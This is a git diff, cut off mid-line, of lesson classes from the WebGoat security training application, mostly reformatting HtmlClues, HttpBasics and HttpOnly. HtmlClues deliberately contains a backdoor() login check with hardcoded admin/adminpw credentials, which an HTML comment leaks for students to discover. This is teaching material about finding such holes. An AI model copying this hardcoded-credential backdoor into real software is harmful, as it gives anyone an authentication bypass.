- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class HtmlClues extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    /**
-     *  Description of the Field
-     */
-    protected final static String PASSWORD = "Password";
-
-    /**
-     *  Description of the Field
-     */
-    protected final static String USERNAME = "Username";
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    private boolean backdoor(WebSession s)
-    {
-	String username = s.getParser().getRawParameter(USERNAME, "");
-	String password = s.getParser().getRawParameter(PASSWORD, "");
-
-	//<START_OMIT_SOURCE>
-	return (username.equals("admin") && password.equals("adminpw"));
-	//<END_OMIT_SOURCE>
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
-	{
-	    //<START_OMIT_SOURCE>
-	    ec.addElement(new Comment("FIXME admin:adminpw"));
-	    //<END_OMIT_SOURCE>
-	    ec.addElement(new Comment("Use Admin to regenerate database"));
-
-	    if (backdoor(s))
-	    {
-		makeSuccess(s);
-
-		s.setMessage("BINGO -- admin authenticated");
-		ec.addElement(makeUser(s, "jsnow", "CREDENTIALS"));
-	    }
-	    else
-	    {
-		ec.addElement(makeLogin(s));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	}
-
-	return (ec);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s              Description of the Parameter
-     * @param  user           Description of the Parameter
-     * @param  method         Description of the Parameter
-     * @return                Description of the Return Value
-     * @exception  Exception  Description of the Exception
-     */
-    protected Element makeUser(WebSession s, String user, String method)
-	    throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement(new P().addElement("Welcome, " + user));
-	ec.addElement(new P().addElement("You have been authenticated with "
-		+ method));
-
-	return (ec);
-    }
-
-
-    protected Element makeLogin(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec.addElement(new H1().addElement("Sign In "));
-	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		.setWidth("90%").setAlign("center");
-
-	if (s.isColor())
-	{
-	    t.setBorder(1);
-	}
-
-	TR tr = new TR();
-	tr
-		.addElement(new TH()
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
 			.addElement(
-				"Please sign in to your account.  See the OWASP admin if you do not have an account.")
-			.setColSpan(2).setAlign("left"));
-	t.addElement(tr);
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-	tr = new TR();
-	tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
-	t.addElement(tr);
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PASSWORD = "Password";
 
-	tr = new TR();
-	tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	t.addElement(tr);
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USERNAME = "Username";
 
-	TR row1 = new TR();
-	TR row2 = new TR();
-	row1.addElement(new TD(new B(new StringElement("*User Name: "))));
-	row2.addElement(new TD(new B(new StringElement("*Password: "))));
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private boolean backdoor(WebSession s)
+	{
+		String username = s.getParser().getRawParameter(USERNAME, "");
+		String password = s.getParser().getRawParameter(PASSWORD, "");
 
-	Input input1 = new Input(Input.TEXT, USERNAME, "");
-	Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-	row1.addElement(new TD(input1));
-	row2.addElement(new TD(input2));
-	t.addElement(row1);
-	t.addElement(row2);
+		// <START_OMIT_SOURCE>
+		return (username.equals("admin") && password.equals("adminpw"));
+		// <END_OMIT_SOURCE>
+	}
 
-	Element b = ECSFactory.makeButton("Login");
-	t.addElement(new TR(new TD(b)));
-	ec.addElement(t);
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-	return (ec);
-    }
+		try
+		{
+			// <START_OMIT_SOURCE>
+			ec.addElement(new Comment("FIXME admin:adminpw"));
+			// <END_OMIT_SOURCE>
+			ec.addElement(new Comment("Use Admin to regenerate database"));
 
+			if (backdoor(s))
+			{
+				makeSuccess(s);
 
-    /**
-     *  Gets the hints attribute of the CluesScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("You can view the HTML source by selecting 'view source' in the browser menu.");
-	hints.add("There are lots of clues in the HTML");
-	hints
-		.add("Search for the word HIDDEN, look at URLs, look for comments.");
+				s.setMessage("BINGO -- admin authenticated");
+				ec.addElement(makeUser(s, "jsnow", "CREDENTIALS"));
+			}
+			else
+			{
+				ec.addElement(makeLogin(s));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+		}
 
-	return hints;
-    }
+		return (ec);
+	}
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param user
+	 *            Description of the Parameter
+	 * @param method
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element makeUser(WebSession s, String user, String method) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new P().addElement("Welcome, " + user));
+		ec.addElement(new P().addElement("You have been authenticated with " + method));
 
-    /**
-     *  Gets the instructions attribute of the HtmlClues object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "Below is an example of a forms based authentication form.  Look for clues to help you log in.";
+		return (ec);
+	}
 
-	return (instructions);
-    }
+	protected Element makeLogin(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-    private final static Integer DEFAULT_RANKING = new Integer(30);
+		ec.addElement(new H1().addElement("Sign In "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+		TR tr = new TR();
+		tr.addElement(new TH()
+				.addElement("Please sign in to your account.  See the OWASP admin if you do not have an account.")
+				.setColSpan(2).setAlign("left"));
+		t.addElement(tr);
 
+		tr = new TR();
+		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+		t.addElement(tr);
 
-    /**
-     *  Gets the category attribute of the FailOpenAuthentication object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.CODE_QUALITY;
-    }
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
 
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+		row2.addElement(new TD(new B(new StringElement("*Password: "))));
 
-    /**
-     *  Gets the title attribute of the CluesScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Discover Clues in the HTML");
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+		Input input1 = new Input(Input.TEXT, USERNAME, "");
+		Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+		row1.addElement(new TD(input1));
+		row2.addElement(new TD(input2));
+		t.addElement(row1);
+		t.addElement(row2);
+
+		Element b = ECSFactory.makeButton("Login");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+
+		return (ec);
+	}
+
+	/**
+	 * Gets the hints attribute of the CluesScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("You can view the HTML source by selecting 'view source' in the browser menu.");
+		hints.add("There are lots of clues in the HTML");
+		hints.add("Search for the word HIDDEN, look at URLs, look for comments.");
+
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the HtmlClues object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "Below is an example of a forms based authentication form.  Look for clues to help you log in.";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(30);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the category attribute of the FailOpenAuthentication object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.CODE_QUALITY;
+	}
+
+	/**
+	 * Gets the title attribute of the CluesScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Discover Clues in the HTML");
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
index 8836562c8..bc229823b 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -10,127 +10,119 @@ import org.apache.ecs.html.Input;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @created October 28, 2003
  */
 public class HttpBasics extends LessonAdapter
 {
-    private final static String PERSON = "person";
+	private final static String PERSON = "person";
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	StringBuffer person = null;
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    ec.addElement(new StringElement("Enter your name: "));
+		ElementContainer ec = new ElementContainer();
 
-	    person = new StringBuffer(s.getParser().getStringParameter(PERSON,
-		    ""));
-	    person.reverse();
+		StringBuffer person = null;
+		try
+		{
+			ec.addElement(new StringElement("Enter your name: "));
 
-	    Input input = new Input(Input.TEXT, PERSON, person.toString());
-	    ec.addElement(input);
+			person = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
+			person.reverse();
 
-	    Element b = ECSFactory.makeButton("Go!");
-	    ec.addElement(b);
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+			Input input = new Input(Input.TEXT, PERSON, person.toString());
+			ec.addElement(input);
+
+			Element b = ECSFactory.makeButton("Go!");
+			ec.addElement(b);
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		if (!person.toString().equals("") && getLessonTracker(s).getNumVisits() > 3)
+		{
+			makeSuccess(s);
+		}
+
+		return (ec);
 	}
 
-	if (!person.toString().equals("")
-		&& getLessonTracker(s).getNumVisits() > 3)
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
 	{
-	    makeSuccess(s);
+		List<String> hints = new ArrayList<String>();
+		hints.add("Type in your name and press 'go'");
+		hints.add("Turn on Show Parameters or other features");
+		hints.add("Press the Show Lesson Plan button to view a lesson summary");
+		hints.add("Press the Show Solution button to view a lesson solution");
+
+		return hints;
 	}
 
-	return (ec);
-    }
+	/**
+	 * Gets the ranking attribute of the HelloScreen object
+	 * 
+	 * @return The ranking value
+	 */
+	private final static Integer DEFAULT_RANKING = new Integer(10);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("Type in your name and press 'go'");
-	hints.add("Turn on Show Parameters or other features");
-	hints.add("Press the Show Lesson Plan button to view a lesson summary");
-	hints.add("Press the Show Solution button to view a lesson solution");
+	protected Category getDefaultCategory()
+	{
+		return Category.GENERAL;
+	}
 
-	return hints;
-    }
-
-    /**
-     *  Gets the ranking attribute of the HelloScreen object
-     *
-     * @return    The ranking value
-     */
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    protected Category getDefaultCategory()
-    {
-	return Category.GENERAL;
-    }
-
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Http Basics");
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Http Basics");
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java
index a28ea80db..da879370d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java
@@ -1,12 +1,11 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.Date;
 import java.util.List;
 import java.security.MessageDigest;
-
 import javax.servlet.http.HttpServletResponse;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -18,351 +17,409 @@ import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
-
 import sun.misc.BASE64Encoder;
-/*******************************************************************************
+
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
-public class HttpOnly extends LessonAdapter {
-	
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
+public class HttpOnly extends LessonAdapter
+{
+
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
+
 	private final static Integer DEFAULT_RANKING = new Integer(125);
-	
+
 	private final static String UNIQUE2U = "unique2u";
-	
+
 	private final static String HTTPONLY = "httponly";
-	
+
 	private final static String ACTION = "action";
-	
+
 	private final static String READ = "Read Cookie";
-	
+
 	private final static String WRITE = "Write Cookie";
-	
+
 	private final static String READ_RESULT = "read_result";
-	
+
 	private boolean httpOnly = false;
-	
+
 	private boolean readSuccess = false;
-	
+
 	private boolean writeSuccess = false;
-	
+
 	private String original = "undefined";
-	
+
 	/**
-	 *  Gets the title attribute of the EmailScreen object
-	 *
-	 * @return    The title value
+	 * Gets the title attribute of the EmailScreen object
+	 * 
+	 * @return The title value
 	 */
 	public String getTitle()
 	{
-		return ( "HTTPOnly Test" );
+		return ("HTTPOnly Test");
 	}
 
 	protected Integer getDefaultRanking()
 	{
 		return DEFAULT_RANKING;
 	}
-	
+
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	protected Element createContent( WebSession s )
+	protected Element createContent(WebSession s)
 	{
 		ElementContainer ec = new ElementContainer();
 		String action = null;
 		String http = null;
-		
+
 		http = s.getRequest().getParameter(HTTPONLY);
 		action = s.getRequest().getParameter(ACTION);
-		
-		if(http != null) {
+
+		if (http != null)
+		{
 			httpOnly = Boolean.parseBoolean(http);
 		}
-		
-		if(httpOnly) {
-//			System.out.println("HttpOnly: Setting HttpOnly for cookie");
+
+		if (httpOnly)
+		{
+			// System.out.println("HttpOnly: Setting HttpOnly for cookie");
 			setHttpOnly(s);
-		} else {
-//			System.out.println("HttpOnly: Removing HttpOnly for cookie");
+		}
+		else
+		{
+			// System.out.println("HttpOnly: Removing HttpOnly for cookie");
 			removeHttpOnly(s);
 		}
-		
-		if(action != null) {
-			if(action.equals(READ)) {
+
+		if (action != null)
+		{
+			if (action.equals(READ))
+			{
 				handleReadAction(s);
-			} else if(action.equals(WRITE)) {
+			}
+			else if (action.equals(WRITE))
+			{
 				handleWriteAction(s);
-			} else {
-				//s.setMessage("Invalid Request. Please try again.");
+			}
+			else
+			{
+				// s.setMessage("Invalid Request. Please try again.");
 			}
 		}
-		
+
 		try
 		{
 			ec.addElement(makeContent(s));
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
-			s.setMessage( "Error generating " + this.getClass().getName() );
+			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
 
-		return ( ec );
+		return (ec);
 	}
 
-
 	/**
-	 *  DOCUMENT ME!
-	 *
-	 * @return    DOCUMENT ME!
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
 	 */
 	protected Category getDefaultCategory()
 	{
 		return Category.XSS;
 	}
 
-
 	/**
-	 *  Gets the hints attribute of the EmailScreen object
-	 *
-	 * @return    The hints value
+	 * Gets the hints attribute of the EmailScreen object
+	 * 
+	 * @return The hints value
 	 */
 	protected List<String> getHints(WebSession s)
 	{
 		List<String> hints = new ArrayList<String>();
-		hints.add( "Read the directions and try out the buttons." );
+		hints.add("Read the directions and try out the buttons.");
 		return hints;
 	}
-	
-	private String createCustomCookieValue() {
+
+	private String createCustomCookieValue()
+	{
 		String value = null;
 		byte[] buffer = null;
 		MessageDigest md = null;
 		BASE64Encoder encoder = new BASE64Encoder();
-		
-		try {
+
+		try
+		{
 			md = MessageDigest.getInstance("SHA");
 			buffer = new Date().toString().getBytes();
-			
+
 			md.update(buffer);
 			value = encoder.encode(md.digest());
 			original = value;
-			
-		} catch (Exception e) {
+
+		} catch (Exception e)
+		{
 			e.printStackTrace();
 		}
-		
+
 		return value;
 	}
-	
-	private void setHttpOnly(WebSession s) {
+
+	private void setHttpOnly(WebSession s)
+	{
 		String value = createCustomCookieValue();
 		HttpServletResponse response = s.getResponse();
 		String cookie = s.getCookie(UNIQUE2U);
-		
-		if(cookie == null || cookie.equals("HACKED")) {
+
+		if (cookie == null || cookie.equals("HACKED"))
+		{
 			response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + "; HttpOnly");
 			original = value;
-		} else {
+		}
+		else
+		{
 			response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + "; HttpOnly");
 			original = cookie;
 		}
 	}
-	
-	private void removeHttpOnly(WebSession s) {
+
+	private void removeHttpOnly(WebSession s)
+	{
 		String value = createCustomCookieValue();
 		HttpServletResponse response = s.getResponse();
 		String cookie = s.getCookie(UNIQUE2U);
-		
-		if(cookie == null || cookie.equals("HACKED")) {
+
+		if (cookie == null || cookie.equals("HACKED"))
+		{
 			response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + ";");
 			original = value;
-		} else {
+		}
+		else
+		{
 			response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + ";");
 			original = cookie;
 		}
 	}
-	
-	private ElementContainer makeContent(WebSession s) {
+
+	private ElementContainer makeContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
 		Element r = null;
 		Table t = null;
 		TR tr = null;
 		Form f = null;
-		
+
 		ec.addElement(new StringElement(getJavaScript()));
 
 		f = new Form();
-		
+
 		t = new Table();
 		t.setWidth(500);
-		
+
 		tr = new TR();
-		
+
 		tr.addElement(new TD(new StringElement("Your browser appears to be: " + getBrowserType(s))));
 		t.addElement(tr);
-		
+
 		tr = new TR();
 		t.addElement(tr);
-		
+
 		tr = new TR();
-		
-		tr.addElement( new TD(new StringElement ("Do you wish to turn HTTPOnly on?")));
-		
-		tr.addElement( new TD(new StringElement ("Yes")));
-		
-		if(httpOnly == true) {
-			r = new Input(Input.RADIO, HTTPONLY, "True" ).addAttribute("Checked", "true");
-		} else {
-			r = new Input(Input.RADIO, HTTPONLY, "True" ).addAttribute("onClick", "document.form.submit()");
+
+		tr.addElement(new TD(new StringElement("Do you wish to turn HTTPOnly on?")));
+
+		tr.addElement(new TD(new StringElement("Yes")));
+
+		if (httpOnly == true)
+		{
+			r = new Input(Input.RADIO, HTTPONLY, "True").addAttribute("Checked", "true");
 		}
-		
+		else
+		{
+			r = new Input(Input.RADIO, HTTPONLY, "True").addAttribute("onClick", "document.form.submit()");
+		}
+
 		tr.addElement(new TD(r));
-		
-		tr.addElement( new TD(new StringElement ("No")));
-		
-		if(httpOnly == false) {
+
+		tr.addElement(new TD(new StringElement("No")));
+
+		if (httpOnly == false)
+		{
 			r = new Input(Input.RADIO, HTTPONLY, "False").addAttribute("Checked", "True");
-		} else {
+		}
+		else
+		{
 			r = new Input(Input.RADIO, HTTPONLY, "False").addAttribute("onClick", "document.form.submit()");
 		}
-		
+
 		tr.addElement(new TD(r));
-		
+
 		r = new Input(Input.HIDDEN, READ_RESULT, "");
 		tr.addElement(r);
-		
+
 		t.addElement(tr);
-		
-/*		tr.addElement(new TD(new StringElement("<strong>Status:</strong> " )));
-		t.addElement(tr);
-		
-		if(httpOnly == true) {
-			tr.addElement(new TD(new StringElement("<div id=\"status\">On</div>")));
-		} else {
-			tr.addElement(new TD(new StringElement ("<div id=\"status\">Off</div>")));
-		}
-		
-		t.addElement(tr);
-		t.addElement(new TR(new TD(new StringElement("<br/>"))));
-*/		f.addElement(t);
-		
+
+		/*
+		 * tr.addElement(new TD(new StringElement("<strong>Status:</strong> " )));
+		 * t.addElement(tr); if(httpOnly == true) { tr.addElement(new TD(new StringElement("<div
+		 * id=\"status\">On</div>"))); } else { tr.addElement(new TD(new StringElement ("<div
+		 * id=\"status\">Off</div>"))); } t.addElement(tr); t.addElement(new TR(new TD(new
+		 * StringElement("<br/>"))));
+		 */f.addElement(t);
+
 		t = new Table();
 		tr = new TR();
-		
+
 		r = new Input(Input.SUBMIT, ACTION, READ).addAttribute("onclick", "myAlert();");
 		tr.addElement(new TD(r));
-		
+
 		r = new Input(Input.SUBMIT, ACTION, WRITE).addAttribute("onclick", "modifyAlert();");
 		tr.addElement(new TD(r));
 		t.addElement(tr);
-		
+
 		f.addElement(t);
 		ec.addElement(f);
-		
+
 		return ec;
 	}
-	
-	private void handleReadAction(WebSession s) {
-		
+
+	private void handleReadAction(WebSession s)
+	{
+
 		String displayed = s.getRequest().getParameter(READ_RESULT);
-		
-		if(httpOnly == true) {
-			if(displayed.indexOf(UNIQUE2U) != -1) {
-				s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U 
+
+		if (httpOnly == true)
+		{
+			if (displayed.indexOf(UNIQUE2U) != -1)
+			{
+				s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U
 						+ "' cookie. It allowed direct client side read access to this cookie.");
-			} else {
-				s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U 
+			}
+			else
+			{
+				s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U
 						+ "' cookie by preventing direct client side read access to this cookie.");
-				if (writeSuccess) { 
-					if (!this.isCompleted(s)) {
+				if (writeSuccess)
+				{
+					if (!this.isCompleted(s))
+					{
 						makeSuccess(s);
 						readSuccess = false;
 						writeSuccess = false;
 					}
-				} else {
-					if (!this.isCompleted(s)) {
+				}
+				else
+				{
+					if (!this.isCompleted(s))
+					{
 						s.setMessage("Now try to see if your browser protects write access to this cookie.");
 						readSuccess = true;
 					}
 				}
 			}
-		} else if(displayed.indexOf(UNIQUE2U) != -1) {
-			s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U + "' cookie was displayed in the alert dialog.");
-		} else {
-			s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U 
+		}
+		else if (displayed.indexOf(UNIQUE2U) != -1)
+		{
+			s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U
+					+ "' cookie was displayed in the alert dialog.");
+		}
+		else
+		{
+			s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U
 					+ "' cookie should have been displayed in the alert dialog, but was not for some reason. "
 					+ "(This shouldn't happen)");
 		}
 	}
-	
-	private void handleWriteAction(WebSession s) {
+
+	private void handleWriteAction(WebSession s)
+	{
 		String hacked = s.getCookie(UNIQUE2U);
-		
-		if(httpOnly == true) {
-			if(!original.equals(hacked)) {
-				s.setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '" + UNIQUE2U + "' cookie.");
-				s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked + " on the client side.");
-			} else {
-				s.setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '" 
-						+ UNIQUE2U + "' cookie by preventing client side modification.");
-				if (readSuccess) { 
-					if (!this.isCompleted(s)) {
+
+		if (httpOnly == true)
+		{
+			if (!original.equals(hacked))
+			{
+				s
